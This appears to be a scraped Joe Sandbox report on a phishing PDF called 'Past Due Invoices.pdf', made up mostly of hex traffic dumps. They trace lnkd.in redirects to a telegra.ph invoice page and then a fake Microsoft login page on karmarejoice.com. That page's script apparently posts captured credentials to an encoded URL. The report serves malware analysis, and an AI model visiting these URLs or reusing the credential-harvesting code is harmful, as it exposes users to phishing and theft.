2022-05-13 18:46:44 UTC	629	IN	Data Raw: db 90 19 9b 6c dc e2 cd d6 38 71 72 66 89 e8 e1 1b 6d 7a bc 08 c0 96 f7 d9 e4 c9 5a 9a bb d6 06 8c 3b d0 c6 2e de 6a 63 a6 cf b7 fe d1 00 b4 7a d8 06 9b ae 87 fa 03 db 52 d8 80 38 0a 04 fb ec 9d 59 da 7e e0 4c 1b 31 77 8b 8d 5f 74 b8 8d 1c ad 73 ab b6 7e 13 4e 69 1e ec 76 22 54 69 71 82 51 7d a3 01 7b a3 0d 9e be c1 c6 ef 97 ef 3d 55 1d 85 aa a8 ef 17 69 05 ba 6a ab 69 38 c0 c6 ed 7d 9a 4d 5a b6 d5 1a 27 4c b0 be 35 83 ac 6f 14 3c aa 27 9c 9a b9 6e 8e 3c cf 46 d5 47 c7 ed ab e3 1e 61 e3 f6 da 6e e3 e6 ad b2 3a 7d 1f b5 7b d9 a4 e6 65 bd db 1b 87 aa 81 d6 b7 df 20 ab 9d 70 b0 8d 5d 74 94 35 4c 18 1f 1d 37 1a f0 8f d1 12 f7 99 b2 4d 87 9e 6a c3 b4 b0 4a f5 30 ab 9b 72 68 f4 fd 6e b5 d1 d3 e6 ba ef ad cf c0 a5 ad c7 70 cb bb 8f 8c ea ac b1 7e a3 56 d9 e8 a6 Data Ascii: l8qrfmzZ;.jczR8Y~L1w_ts~Niv"TiqQ}{=Uiji8}MZ'L5o<'n<FGan:}{e p]t5L7MjJ0rhnp~V

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:45 UTC	634	OUT	GET /images/icons.png?1 HTTP/1.1 Host: telegra.ph Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:45 UTC	634	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:45 GMT Content-Type: image/png Content-Length: 3295 Last-Modified: Tue, 22 Nov 2016 01:40:43 GMT Connection: close ETag: "5833a21b-cdf" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Accept-Ranges: bytes
2022-05-13 18:46:45 UTC	634	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 01 e7 08 06 00 00 00 ca 37 1f b8 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0c 81 49 44 41 54 78 da ec 9d 0f 90 55 55 1d c7 cf ae c0 16 da 0a fb 12 d9 02 ca 74 8d 22 08 65 47 73 98 64 20 83 30 2d ad 61 b2 26 1b 46 1c 4d 4c 12 c7 00 ff a4 36 39 4e 99 b4 e3 8c 22 da 54 38 fd 43 47 21 84 06 15 83 d1 19 c5 64 4d 11 5d 33 17 c1 14 30 e0 01 f1 27 e3 ef eb fb eb fe 1e 9c bd dc bb bb ef be 7b cf 3d 4b df 33 f3 9d f7 ee b9 67 ef fd ec f9 77 ef f9 be 73 ef a9 29 95 4a c6 e7 50 6b 3c 0f 04 24 20 01 09 48 40 02 e6 0b b8 0e 2a 85 b4 13 da a5 df b7 42 7f 81 7e 08 9d 90 e8 0c 72 b3 90 82 ec 50 8e 3b 13 da 60 c5 af 84 6a 2b 3d 76 96 Data Ascii: PNGIHDR(7tEXtSoftwareAdobe ImageReadyqe<IDATxUUt"eGsd 0-a&FML69N"T8CG!dM]30'{=K3gws)JPk<$ H@*B~rP;`j+=v

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Past Due Invoices.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

Windows Analysis Report
Past Due Invoices.pdf

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:45 UTC	638	OUT	POST /check HTTP/1.1 Host: edit.telegra.ph Connection: keep-alive Content-Length: 29 Accept: application/json, text/javascript, /; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://telegra.ph Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:45 UTC	638	OUT	Data Raw: 70 61 67 65 5f 69 64 3d 38 38 61 37 39 63 33 62 31 35 32 66 63 37 35 36 63 65 62 63 30 Data Ascii: page_id=88a79c3b152fc756cebc0
2022-05-13 18:46:45 UTC	638	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:45 GMT Content-Type: application/json; charset=utf-8 Content-Length: 82 Connection: close Access-Control-Allow-Origin: https://telegra.ph Access-Control-Allow-Credentials: true Set-Cookie: tph_auth_alert=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; secure; HttpOnly Pragma: no-cache Cache-control: no-store Strict-Transport-Security: max-age=35768000
2022-05-13 18:46:45 UTC	639	IN	Data Raw: 7b 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 22 2c 22 61 75 74 68 6f 72 5f 6e 61 6d 65 22 3a 22 22 2c 22 61 75 74 68 6f 72 5f 75 72 6c 22 3a 22 22 2c 22 73 61 76 65 5f 68 61 73 68 22 3a 22 22 2c 22 63 61 6e 5f 65 64 69 74 22 3a 66 61 6c 73 65 7d Data Ascii: {"short_name":"","author_name":"","author_url":"","save_hash":"","can_edit":false}

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:45 UTC	639	OUT	GET /favicon.ico?1 HTTP/1.1 Host: telegra.ph Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:45 UTC	639	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:45 GMT Content-Type: image/x-icon Content-Length: 5430 Last-Modified: Tue, 22 Nov 2016 15:54:16 GMT Connection: close ETag: "58346a28-1536" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Accept-Ranges: bytes
2022-05-13 18:46:45 UTC	639	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fb fb fb c4 fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fb fb fb c4 fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa Data Ascii: h& (

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:46 UTC	645	OUT	GET /file/9f1d012ceb04882d3fbb6.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Host: telegra.ph
2022-05-13 18:46:46 UTC	646	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:46 GMT Content-Type: image/png Content-Length: 20268 Connection: close Cache-Control: max-age=2592000, public Expires: Sun, 12 Jun 2022 18:46:46 GMT ETag: "634ba9f4c887afc0b1da51b2dd75bc0db756e53f" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2022-05-13 18:46:46 UTC	646	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 55 00 00 01 a8 08 06 00 00 00 ae 6c cf 28 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 4e ce 49 44 41 54 78 5e ed bd 09 98 1c 55 bd bf 9f 99 4c 92 49 66 b2 67 26 fb be 6f 93 90 84 90 95 25 04 12 b6 00 49 08 11 90 1d 04 14 e4 82 80 a2 28 20 3f 51 41 59 95 45 71 17 94 45 dc 15 37 e4 aa 97 eb a3 7f ff 8a e0 8a f7 f2 53 11 41 40 d0 00 01 92 7c 7f f5 39 3d 35 d3 3d 73 6a fa cc 74 f5 74 f7 cc fb 3e cf fb 90 74 9d 3a 55 e7 74 cd 70 3e 39 55 a7 fa 18 00 00 00 00 00 00 74 19 42 15 00 00 00 00 00 40 01 10 aa 00 00 00 00 00 00 0a 80 50 05 00 00 00 00 00 50 00 84 2a 00 00 00 00 00 80 02 20 54 01 00 00 00 00 00 14 00 a1 0a 00 00 00 00 00 a0 Data Ascii: PNGIHDRUl(gAMAapHYsodNIDATx^ULIfg&o%I( ?QAYEqE7SA@\|9=5=sjtt>t:Utp>9UtB@PP* T
2022-05-13 18:46:46 UTC	662	IN	Data Raw: db 90 19 9b 6c dc e2 cd d6 38 71 72 66 89 e8 e1 1b 6d 7a bc 08 c0 96 f7 d9 e4 c9 5a 9a bb d6 06 8c 3b d0 c6 2e de 6a 63 a6 cf b7 fe d1 00 b4 7a d8 06 9b ae 87 fa 03 db 52 d8 80 38 0a 04 fb ec 9d 59 da 7e e0 4c 1b 31 77 8b 8d 5f 74 b8 8d 1c ad 73 ab b6 7e 13 4e 69 1e ec 76 22 54 69 71 82 51 7d a3 01 7b a3 0d 9e be c1 c6 ef 97 ef 3d 55 1d 85 aa a8 ef 17 69 05 ba 6a ab 69 38 c0 c6 ed 7d 9a 4d 5a b6 d5 1a 27 4c b0 be 35 83 ac 6f 14 3c aa 27 9c 9a b9 6e 8e 3c cf 46 d5 47 c7 ed ab e3 1e 61 e3 f6 da 6e e3 e6 ad b2 3a 7d 1f b5 7b d9 a4 e6 65 bd db 1b 87 aa 81 d6 b7 df 20 ab 9d 70 b0 8d 5d 74 94 35 4c 18 1f 1d 37 1a f0 8f d1 12 f7 99 b2 4d 87 9e 6a c3 b4 b0 4a f5 30 ab 9b 72 68 f4 fd 6e b5 d1 d3 e6 ba ef ad cf c0 a5 ad c7 70 cb bb 8f 8c ea ac b1 7e a3 56 d9 e8 a6 Data Ascii: l8qrfmzZ;.jczR8Y~L1w_ts~Niv"TiqQ}{=Uiji8}MZ'L5o<'n<FGan:}{e p]t5L7MjJ0rhnp~V

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:46 UTC	645	OUT	GET /images/favicon_2x.png?1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Host: telegra.ph
2022-05-13 18:46:46 UTC	645	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:46 GMT Content-Type: image/png Content-Length: 222 Last-Modified: Tue, 22 Nov 2016 15:54:16 GMT Connection: close ETag: "58346a28-de" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Accept-Ranges: bytes
2022-05-13 18:46:46 UTC	645	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 98 49 44 41 54 58 09 63 fc f3 e7 8f e7 ff ff ff 67 01 b1 0c 03 1d 01 23 23 e3 13 20 4e 63 fc fd fb f7 63 7a 5b 0e f3 27 d8 11 bf 7e fd fa 0f 13 18 08 9a 69 20 2c 45 b6 73 d4 01 a3 21 c0 82 9c 20 b0 b1 15 14 14 b0 09 13 2d f6 e0 c1 03 bc 6a 47 a3 60 c0 43 80 91 dc 92 10 3d 6d 10 8a 6b 5c 09 61 c0 43 60 d4 01 a3 21 30 1a 02 a3 21 30 1a 02 64 d7 05 b8 ca 76 52 c5 47 a3 60 34 04 06 3e 04 40 1d 44 52 53 2e b5 d4 83 ec 66 02 77 91 07 c0 11 e0 9e 31 b0 7b 0e 00 68 52 29 84 35 3f 30 71 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR szzsRGBIDATXcg## Nccz['~i ,Es! -jG`C=mk\aC`!0!0dvRG`4>@DRS.fw1{hR)5?0qIENDB`

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:46 UTC	666	OUT	GET /images/icons.png?1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Host: telegra.ph
2022-05-13 18:46:46 UTC	666	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:46 GMT Content-Type: image/png Content-Length: 3295 Last-Modified: Tue, 22 Nov 2016 01:40:43 GMT Connection: close ETag: "5833a21b-cdf" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Accept-Ranges: bytes
2022-05-13 18:46:46 UTC	666	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 01 e7 08 06 00 00 00 ca 37 1f b8 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0c 81 49 44 41 54 78 da ec 9d 0f 90 55 55 1d c7 cf ae c0 16 da 0a fb 12 d9 02 ca 74 8d 22 08 65 47 73 98 64 20 83 30 2d ad 61 b2 26 1b 46 1c 4d 4c 12 c7 00 ff a4 36 39 4e 99 b4 e3 8c 22 da 54 38 fd 43 47 21 84 06 15 83 d1 19 c5 64 4d 11 5d 33 17 c1 14 30 e0 01 f1 27 e3 ef eb fb eb fe 1e 9c bd dc bb bb ef be 7b cf 3d 4b df 33 f3 9d f7 ee b9 67 ef fd ec f9 77 ef f9 be 73 ef a9 29 95 4a c6 e7 50 6b 3c 0f 04 24 20 01 09 48 40 02 e6 0b b8 0e 2a 85 b4 13 da a5 df b7 42 7f 81 7e 08 9d 90 e8 0c 72 b3 90 82 ec 50 8e 3b 13 da 60 c5 af 84 6a 2b 3d 76 96 Data Ascii: PNGIHDR(7tEXtSoftwareAdobe ImageReadyqe<IDATxUUt"eGsd 0-a&FML69N"T8CG!dM]30'{=K3gws)JPk<$ H@*B~rP;`j+=v

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:43 UTC	1	OUT	GET /dptWHpAa HTTP/1.1 Host: lnkd.in Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:43 UTC	1	IN	HTTP/1.1 301 Moved Permanently Location: https://telegra.ph/Past-Due-Invoice-05-13 Vary: Accept-Encoding X-Cache: TCP_HIT Server: Apache-Coyote/1.1 X-Li-Fabric: prod-lva1 X-Li-Pop: prod-lva1-x X-LI-Proto: http/1.1 X-LI-UUID: AAXe6HHjFvuSs9tpcrlxRg== X-MSEdge-Ref: Ref A: 319C7AC86B994AA298294BB85F8C32D6 Ref B: FRAEDGE1111 Ref C: 2022-05-13T18:46:43Z Date: Fri, 13 May 2022 18:46:42 GMT Connection: close Content-Length: 0

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:53 UTC	669	OUT	GET /d-ad9VpM HTTP/1.1 Host: lnkd.in Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:53 UTC	670	IN	HTTP/1.1 301 Moved Permanently Location: https://karmarejoice.com/lopi/office-RD117/ Vary: Accept-Encoding X-Cache: TCP_HIT Server: Apache-Coyote/1.1 X-Li-Fabric: prod-lva1 X-Li-Pop: prod-lva1-x X-LI-Proto: http/1.1 X-LI-UUID: AAXe6HMswjfusHFmNm/IdA== X-MSEdge-Ref: Ref A: EDC8CA82BB8743F6AF9F54D07B21B438 Ref B: FRAEDGE1412 Ref C: 2022-05-13T18:46:53Z Date: Fri, 13 May 2022 18:46:52 GMT Connection: close Content-Length: 0

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:53 UTC	670	OUT	GET /lopi/office-RD117/ HTTP/1.1 Host: karmarejoice.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:54 UTC	671	IN	HTTP/1.1 200 OK Date: Fri, 13 May 2022 18:46:54 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 31 Aug 2020 21:49:46 GMT Accept-Ranges: bytes Content-Length: 18086 Vary: Accept-Encoding Content-Type: text/html
2022-05-13 18:46:54 UTC	671	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 3a 20 30 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 6c 6f 67 6f 75 74 2e 73 72 66 3f 63 74 3d 31 35 34 38 33 34 33 35 39 32 26 72 76 65 72 3d 36 34 2e 34 2e 36 34 35 36 2e 30 26 6c 63 3d 31 30 33 33 26 69 64 3d 35 30 31 33 39 32 22 20 68 65 69 67 68 74 3d 22 30 22 20 77 69 64 74 68 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 20 2d 2d 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: <!DOCTYPE html><html lang="en">... <iframe style="border: 0;" src="https://login.microsoftonline.com/logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392" height="0" width="0"></iframe> --><head> <meta charset="UTF-8"> <meta name
2022-05-13 18:46:54 UTC	679	IN	Data Raw: 34 78 74 64 45 38 62 36 58 70 65 6d 32 39 7a 4a 4e 46 46 44 39 6a 6d 6a 75 4a 35 49 30 5a 6d 43 68 6e 4f 41 75 33 35 6d 49 78 6e 35 52 79 65 50 58 36 6b 44 7a 33 39 72 5a 6d 58 39 6c 54 34 6d 73 70 77 52 38 50 64 61 49 49 37 66 36 44 4e 58 34 61 2f 62 62 7a 2f 6e 36 6b 2f 77 43 2f 68 72 39 30 76 32 6f 4e 49 31 62 78 42 2b 7a 52 38 52 4e 42 30 48 53 37 69 2b 76 72 37 77 4c 71 39 76 5a 32 64 6e 43 30 6b 31 78 4d 39 6c 4b 71 52 6f 69 67 73 7a 4d 78 41 43 67 45 6b 6b 41 56 2b 4e 66 2f 41 41 79 52 2b 31 62 2f 41 4e 47 79 66 45 4c 2f 41 4d 49 75 2b 2f 38 41 6a 56 66 69 33 69 6c 68 73 56 58 78 2b 48 64 4b 45 70 57 69 39 6b 33 31 38 6a 2b 73 76 6f 36 35 68 6c 2b 44 79 58 48 52 78 4e 57 45 47 36 6b 62 63 30 6b 72 2b 37 30 75 30 65 6a 66 38 45 73 4c 71 35 6b 2f 62 Data Ascii: 4xtdE8b6Xpem29zJNFFD9jmjuJ5I0ZmChnOAu35mIxn5RyePX6kDz39rZmX9lT4mspwR8PdaII7f6DNX4a/bbz/n6k/wC/hr90v2oNI1bxB+zR8RNB0HS7i+vr7wLq9vZ2dnC0k1xM9lKqRoigszMxACgEkkAV+Nf/AAyR+1b/ANGyfEL/AMIu+/8AjVfi3ilhsVXx+HdKEpWi9k318j+svo65hl+DyXHRxNWEG6kbc0kr+70u0ejf8EsLq5k/b
2022-05-13 18:46:54 UTC	687	IN	Data Raw: 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 6e 65 77 20 69 6e 6a 65 63 74 69 6f 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 0d 0a 20 20 20 20 20 20 20 20 63 6f 75 6e 74 20 3d 20 63 6f 75 6e 74 20 2b 20 31 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 24 2e 61 6a 61 78 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 54 79 70 65 3a 20 27 4a 53 4f 4e 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 72 6c 3a 20 61 74 6f 62 28 66 69 6c 65 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 3a 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 69 3a 20 61 69 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: erCase(); ///////////new injection//////////////// count = count + 1; $.ajax({ dataType: 'JSON', url: atob(file), type: 'POST', data: { ai: ai,

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:54 UTC	689	OUT	GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive Origin: https://karmarejoice.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://karmarejoice.com/lopi/office-RD117/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:54 UTC	803	IN	HTTP/1.1 200 OK Date: Fri, 13 May 2022 18:46:54 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03fa9-4af4" Last-Modified: Mon, 04 May 2020 16:15:37 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" CF-Cache-Status: HIT Age: 1365571 Expires: Wed, 03 May 2023 18:46:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PkPFd5BjF2yYja3xRPWL1l7kd35P9wF8NyKNbceJZ2CW9xX5buGk3zZuVjCY4voOrmlc7EnEAAKUCa80dmYW90j9DWvt%2FjVZOr29UTNhHbk%2F59g%2BZk9MfudDLTD%2BfumrcRSkl1IH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 70ad8f3e8bac92b9-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
